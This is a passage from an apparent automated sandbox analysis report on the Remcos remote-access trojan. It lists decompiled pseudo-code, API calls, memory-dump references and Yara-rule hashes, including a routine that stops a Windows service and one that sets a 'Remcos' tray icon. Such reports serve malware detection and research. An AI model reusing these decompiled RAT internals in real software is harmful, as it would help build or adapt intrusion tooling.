                                            0x0041042e
                                            0x00410440
                                            0x00410445
                                            0x0041044b
                                            0x00410454
                                            0x00410463
                                            0x00410468
                                            0x0041046b
                                            0x0041046e
                                            0x00410430
                                            0x00410437
                                            0x0041043a
                                            0x0041043c
                                            0x0041043c
                                            0x00410416
                                            0x00410417
                                            0x00410417
                                            0x00410473
                                            0x00410480

                                            APIs
                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0040FDA0,00000000), ref: 004103F3
                                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0040FDA0,00000000), ref: 0041040A
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0040FDA0,00000000), ref: 00410417
                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0040FDA0,00000000), ref: 00410426
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0040FDA0,00000000), ref: 00410437
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0040FDA0,00000000), ref: 0041043A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Service$CloseHandle$Open$ControlManager
                                            • String ID:
                                            • API String ID: 221034970-0
                                            • Opcode ID: d3737c23e306a9dd360b0b70e54d9c63ffde2eb5559a754390c86dcd2c5f856a
                                            • Instruction ID: b1508682e8318dda1b629ce45a16f0fe0e8a8a7890f989d6e39f430f4d1780e0
                                            • Opcode Fuzzy Hash: d3737c23e306a9dd360b0b70e54d9c63ffde2eb5559a754390c86dcd2c5f856a
                                            • Instruction Fuzzy Hash: 8211E539900228ABD720AF64DCC9DFF3B3CDB47365B000036FA0592140DB689C86EAB9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00438C6D, Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00438C6D(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x44d130) {
					E00437795(_t52);
					_t26 = _a4;
				}
				E00437795( *((intOrPtr*)(_t26 + 0x3c)));
				E00437795( *((intOrPtr*)(_a4 + 0x30)));
				E00437795( *((intOrPtr*)(_a4 + 0x34)));
				E00437795( *((intOrPtr*)(_a4 + 0x38)));
				E00437795( *((intOrPtr*)(_a4 + 0x28)));
				E00437795( *((intOrPtr*)(_a4 + 0x2c)));
				E00437795( *((intOrPtr*)(_a4 + 0x40)));
				E00437795( *((intOrPtr*)(_a4 + 0x44)));
				E00437795( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00438B33(5,  &_v8);
				_v8 =  &_a4;
				return E00438B83(4,  &_v8);
			}




                                            0x00438c73
                                            0x00438c76
                                            0x00438c7e
                                            0x00438c81
                                            0x00438c86
                                            0x00438c89
                                            0x00438c8d
                                            0x00438c98
                                            0x00438ca3
                                            0x00438cae
                                            0x00438cb9
                                            0x00438cc4
                                            0x00438ccf
                                            0x00438cda
                                            0x00438ce8
                                            0x00438cf0
                                            0x00438cf9
                                            0x00438d01
                                            0x00438d15

                                            APIs
                                            • _free.LIBCMT ref: 00438C81
                                              • Part of subcall function 00437795: HeapFree.KERNEL32(00000000,00000000,?,0043E6DF,00000000,00000000,00000000,00000000,?,0043E983,00000000,00000007,00000000,?,0043EECE,00000000), ref: 004377AB
                                              • Part of subcall function 00437795: GetLastError.KERNEL32(00000000,?,0043E6DF,00000000,00000000,00000000,00000000,?,0043E983,00000000,00000007,00000000,?,0043EECE,00000000,00000000), ref: 004377BD
                                            • _free.LIBCMT ref: 00438C8D
                                            • _free.LIBCMT ref: 00438C98
                                            • _free.LIBCMT ref: 00438CA3
                                            • _free.LIBCMT ref: 00438CAE
                                            • _free.LIBCMT ref: 00438CB9
                                            • _free.LIBCMT ref: 00438CC4
                                            • _free.LIBCMT ref: 00438CCF
                                            • _free.LIBCMT ref: 00438CDA
                                            • _free.LIBCMT ref: 00438CE8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 7ac388b3768902cbef50113da5033acad2f397ce4201ec55d7ae92b2409eed83
                                            • Instruction ID: 5ed3b6159326228a8b5a93d91ec71f023d3c22bf14b36d392abd79819edbdf44
                                            • Opcode Fuzzy Hash: 7ac388b3768902cbef50113da5033acad2f397ce4201ec55d7ae92b2409eed83
                                            • Instruction Fuzzy Hash: 9211FBB9505118BFCB11EF65C842CDD7BA6EF093A4F0150AAF9484F262EB35EE509B44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403ACF, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62sleepfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,004610E0,004554E8), ref: 00403B25
                                            • Sleep.KERNEL32(00000064), ref: 00403B3E
                                            • TerminateProcess.KERNEL32(00000000), ref: 00403B57
                                            • CloseHandle.KERNEL32(?,004554E8,00422FE6), ref: 00403B63
                                            • CloseHandle.KERNEL32(?,004554E8,00422FE6), ref: 00403B6F
                                            • CloseHandle.KERNEL32(?,004554E8,00422FE6), ref: 00403B85
                                            • CloseHandle.KERNEL32(?,004554E8,00422FE6), ref: 00403B91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: CloseHandle$FileProcessSleepTerminateWrite
                                            • String ID: X(F
                                            • API String ID: 1476062558-1594682389
                                            • Opcode ID: 5e69aaf5ed8380aa707f147eb44e415cd1af53af49222df8816eafc53fc9babc
                                            • Instruction ID: f23dfe91afac71cc4e2a2b733eaad0bbaa416939a9d08f3ba8b9ffb861e8ab78
                                            • Opcode Fuzzy Hash: 5e69aaf5ed8380aa707f147eb44e415cd1af53af49222df8816eafc53fc9babc
                                            • Instruction Fuzzy Hash: D711B4352015027FCB157BA1EE568AE3BAAAB9630570001BBF401A21B2DFB50D05FB2E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004124F8, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004124F8(void* __eflags) {
				struct tagMSG _v32;
				char _v300;
				int _t14;

				GetModuleFileNameA(0,  &_v300, 0x104);
				 *0x460e2c = E004125AA();
				0x460e28->cbSize = 0x1fc;
				 *0x460e30 = 1;
				 *0x460e38 = 0x401;
				 *0x460e3c = ExtractIconA(0,  &_v300, 0);
				lstrcpynA(0x460e40, "Remcos", 0x80);
				 *0x460e34 = 7;
				Shell_NotifyIconA(0, 0x460e28);
				while(1) {
					_t14 = GetMessageA( &_v32, 0, 0, 0);
					if(_t14 == 0) {
						break;
					}
					TranslateMessage( &_v32);
					DispatchMessageA( &_v32);
				}
				return _t14;
			}






                                            0x00412511
                                            0x0041251c
                                            0x0041252a
                                            0x00412534
                                            0x0041253e
                                            0x0041255d
                                            0x00412562
                                            0x0041256e
                                            0x00412578
                                            0x00412594
                                            0x0041259b
                                            0x004125a3
                                            0x00000000
                                            0x00000000
                                            0x00412584
                                            0x0041258e
                                            0x0041258e
                                            0x004125a9

                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00412511
                                              • Part of subcall function 004125AA: RegisterClassExA.USER32(00000030), ref: 004125F6
                                              • Part of subcall function 004125AA: CreateWindowExA.USER32 ref: 00412611
                                              • Part of subcall function 004125AA: GetLastError.KERNEL32 ref: 0041261B
                                            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 00412548
                                            • lstrcpynA.KERNEL32(00460E40,Remcos,00000080), ref: 00412562
                                            • Shell_NotifyIconA.SHELL32(00000000,00460E28), ref: 00412578
                                            • TranslateMessage.USER32(?), ref: 00412584
                                            • DispatchMessageA.USER32 ref: 0041258E
                                            • GetMessageA.USER32 ref: 0041259B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                            • String ID: Remcos
                                            • API String ID: 1970332568-165870891
                                            • Opcode ID: 586b2ea813a7f4c44776d7519caa2db98ad44286768e0c6aa60da7efbcba32d8
                                            • Instruction ID: 9549afe967e35ae86d2e3f5b7e0ed4cbea8115523228bbddbafbd630c34b03ac
                                            • Opcode Fuzzy Hash: 586b2ea813a7f4c44776d7519caa2db98ad44286768e0c6aa60da7efbcba32d8
                                            • Instruction Fuzzy Hash: 9F018E76900215BBD7109FA1EC8CE9B7BBCFB86701F00486AE504C2060E7FA5444DB5D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043BD1C, Relevance: 13.8, APIs: 9, Instructions: 300COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 77%
                                            			E0043BD1C(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E00432901();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E00432914())) = 9;
						L59:
						_t145 = E00430C7A();
						goto L60;
					}
					__eflags = _t213 -  *0x460920; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x460720 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E00436F33(_t224, _t158);
								E00437795(0);
								E00437795(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E0043B351(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x460720 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x460720 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x460720 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x460720 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x460720 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x460720 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x460720 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E00444533(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E004328DE(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E00432914())) = 9;
											 *(E00432901()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x460720 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E0043B878();
												} else {
													_t176 = E0043BB88();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E0043BA38(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x460720 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E00432914())) = 0xc;
									 *(E00432901()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E00437795(_t246);
									return _t242;
								}
							}
							L15:
							 *(E00432901()) =  *_t206 & _t246;
							 *((intOrPtr*)(E00432914())) = 0x16;
							E00430C7A();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E00432901()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E00432914())) = 0x16;
					goto L59;
				} else {
					 *(E00432901()) =  *_t212 & 0x00000000;
					_t145 = E00432914();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}



























































                                            0x0043bd25
                                            0x0043bd2c
                                            0x0043bd46
                                            0x0043bd48
                                            0x0043c0b0
                                            0x0043c0b0
                                            0x0043c0b5
                                            0x0043c0b5
                                            0x0043c0bd
                                            0x0043c0c3
                                            0x0043c0c3
                                            0x00000000
                                            0x0043c0c3
                                            0x0043bd4e
                                            0x0043bd54
                                            0x00000000
                                            0x00000000
                                            0x0043bd5c
                                            0x0043bd68
                                            0x0043bd6b
                                            0x0043bd6e
                                            0x0043bd71
                                            0x0043bd78
                                            0x0043bd7b
                                            0x0043bd7f
                                            0x0043bd82
                                            0x0043bd85
                                            0x00000000
                                            0x00000000
                                            0x0043bd8b
                                            0x0043bd8e
                                            0x0043bd94
                                            0x0043bdae
                                            0x0043bdb0
                                            0x0043c0ac
                                            0x00000000
                                            0x0043c0ac
                                            0x0043bdb6
                                            0x0043bdba
                                            0x00000000
                                            0x00000000
                                            0x0043bdc0
                                            0x0043bdc4
                                            0x00000000
                                            0x00000000
                                            0x0043bdcb
                                            0x0043bdcf
                                            0x0043bdd2
                                            0x0043bdd5
                                            0x0043bdda
                                            0x0043bdda
                                            0x0043bddd
                                            0x0043bdfa
                                            0x0043bdff
                                            0x0043be01
                                            0x0043be03
                                            0x0043be23
                                            0x0043be24
                                            0x0043be26
                                            0x0043be29
                                            0x0043be2b
                                            0x0043be2d
                                            0x0043be2f
                                            0x0043be2f
                                            0x0043be3a
                                            0x0043be3c
                                            0x0043be43
                                            0x0043be48
                                            0x0043be4b
                                            0x0043be4e
                                            0x0043be50
                                            0x0043be75
                                            0x0043be7a
                                            0x0043be81
                                            0x0043be84
                                            0x0043be87
                                            0x0043be8b
                                            0x0043be8d
                                            0x0043be91
                                            0x0043be93
                                            0x0043be96
                                            0x0043be99
                                            0x0043be9b
                                            0x0043be9e
                                            0x0043bea5
                                            0x0043bea8
                                            0x0043bead
                                            0x0043beb0
                                            0x0043beb9
                                            0x0043bebd
                                            0x0043bec0
                                            0x0043bec3
                                            0x0043bec6
                                            0x0043becc
                                            0x0043bece
                                            0x0043bed7
                                            0x0043beda
                                            0x0043bedd
                                            0x0043bee0
                                            0x0043bee1
                                            0x0043bee5
                                            0x0043beeb
                                            0x0043bef5
                                            0x0043befa
                                            0x0043bf0a
                                            0x0043bf0e
                                            0x0043bf11
                                            0x0043bf13
                                            0x0043bf15
                                            0x0043bf17
                                            0x0043bf19
                                            0x0043bf21
                                            0x0043bf22
                                            0x0043bf25
                                            0x0043bf28
                                            0x0043bf29
                                            0x0043bf2f
                                            0x0043bf39
                                            0x0043bf41
                                            0x0043bf44
                                            0x0043bf50
                                            0x0043bf54
                                            0x0043bf57
                                            0x0043bf59
                                            0x0043bf5b
                                            0x0043bf5d
                                            0x0043bf5f
                                            0x0043bf67
                                            0x0043bf68
                                            0x0043bf6b
                                            0x0043bf6e
                                            0x0043bf6e
                                            0x0043bf6f
                                            0x0043bf75
                                            0x0043bf7f
                                            0x0043bf7f
                                            0x0043bf5d
                                            0x0043bf59
                                            0x0043bf44
                                            0x0043bf17
                                            0x0043bf13
                                            0x0043befa
                                            0x0043bece
                                            0x0043bec6
                                            0x0043bf85
                                            0x0043bf8b
                                            0x0043bf8d
                                            0x0043c000
                                            0x0043c000
                                            0x0043c004
                                            0x0043c014
                                            0x0043c01a
                                            0x0043c01c
                                            0x0043c078
                                            0x0043c078
                                            0x0043c080
                                            0x0043c081
                                            0x0043c083
                                            0x0043c09c
                                            0x0043c09f
                                            0x0043bfdc
                                            0x0043bfdd
                                            0x00000000
                                            0x0043bfe2
                                            0x0043c0a5
                                            0x00000000
                                            0x0043c0a5
                                            0x0043c08a
                                            0x0043c095
                                            0x00000000
                                            0x0043c095
                                            0x0043c01e
                                            0x0043c021
                                            0x0043c024
                                            0x00000000
                                            0x00000000
                                            0x0043c026
                                            0x0043c026
                                            0x0043c029
                                            0x0043c02c
                                            0x0043c02f
                                            0x0043c036
                                            0x0043c03b
                                            0x0043c03d
                                            0x0043c041
                                            0x0043c05c
                                            0x0043c060
                                            0x0043c061
                                            0x0043c064
                                            0x0043c065
                                            0x0043c071
                                            0x0043c067
                                            0x0043c067
                                            0x0043c067
                                            0x0043c043
                                            0x0043c043
                                            0x0043c043
                                            0x0043c04e
                                            0x0043c053
                                            0x0043c056
                                            0x0043c056
                                            0x00000000
                                            0x0043c03b
                                            0x0043bf92
                                            0x0043bf95
                                            0x0043bf9c
                                            0x0043bfa1
                                            0x00000000
                                            0x00000000
                                            0x0043bfaa
                                            0x0043bfb0
                                            0x0043bfb2
                                            0x00000000
                                            0x00000000
                                            0x0043bfb4
                                            0x0043bfb8
                                            0x00000000
                                            0x00000000
                                            0x0043bfcc
                                            0x0043bfd2
                                            0x0043bfd4
                                            0x0043bff8
                                            0x0043bffb
                                            0x00000000
                                            0x0043bffb
                                            0x0043bfd6
                                            0x00000000
                                            0x0043be52
                                            0x0043be57
                                            0x0043be62
                                            0x0043bfe3
                                            0x0043bfe3
                                            0x0043bfe3
                                            0x0043bfe6
                                            0x0043bfe7
                                            0x00000000
                                            0x0043bfef
                                            0x0043be50
                                            0x0043be05
                                            0x0043be0a
                                            0x0043be11
                                            0x0043be17
                                            0x00000000
                                            0x0043be17
                                            0x0043bddf
                                            0x0043bde2
                                            0x0043bdec
                                            0x0043bdec
                                            0x0043bdef
                                            0x0043bdf2
                                            0x00000000
                                            0x0043bdf2
                                            0x0043bde6
                                            0x0043bde8
                                            0x0043bdea
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043bdea
                                            0x0043bd96
                                            0x0043bd9b
                                            0x0043bda3
                                            0x00000000
                                            0x0043bd2e
                                            0x0043bd33
                                            0x0043bd36
                                            0x0043bd3b
                                            0x0043c0c8
                                            0x00000000
                                            0x0043c0c8

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5f68011433aadd329d8ea3dee6360ce57bc64f3d07ec5b797dd261fb8924e14a
                                            • Instruction ID: e0839ad8a13d4baf9d10918a7acc3aded1fe5b8bcf533eb8646c2634a44f3442
                                            • Opcode Fuzzy Hash: 5f68011433aadd329d8ea3dee6360ce57bc64f3d07ec5b797dd261fb8924e14a
                                            • Instruction Fuzzy Hash: 6FC1F970A04289DFDF15DFA9C881BAEBBB0EF0D314F14615AE540A7392C7789941CFA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004445F1, Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 83%
                                            			E004445F1(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				intOrPtr _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr* _t125;
				short* _t126;
				int _t128;
				int _t129;
				short* _t130;
				intOrPtr* _t131;
				signed int _t132;
				short* _t133;

				_t63 =  *0x45f014; // 0x8d941b67
				_v8 = _t63 ^ _t132;
				_t128 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t125 = _a16;
				_v36 = _t125;
				if(_t128 <= 0) {
					if(_t128 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t128 = E00437779(_t125, _t128);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = E00437779(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t70 =  *( *_v44 + 8);
							_a32 = _t70;
						}
						if(_t128 == 0 || _t99 == 0) {
							if(_t128 != _t99) {
								if(_t99 <= 1) {
									if(_t128 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t128 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t131 = _v40;
															while(1) {
																_t122 =  *((intOrPtr*)(_t114 + 1));
																if(_t122 == 0) {
																	goto L15;
																}
																_t101 =  *_t131;
																if(_t101 <  *_t114 || _t101 > _t122) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t123 =  *((intOrPtr*)(_t115 + 1));
															if(_t123 == 0) {
																goto L17;
															}
															_t102 =  *_t125;
															if(_t102 <  *_t115 || _t102 > _t123) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t126 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E00436F33(_t112, _t85 & _t112);
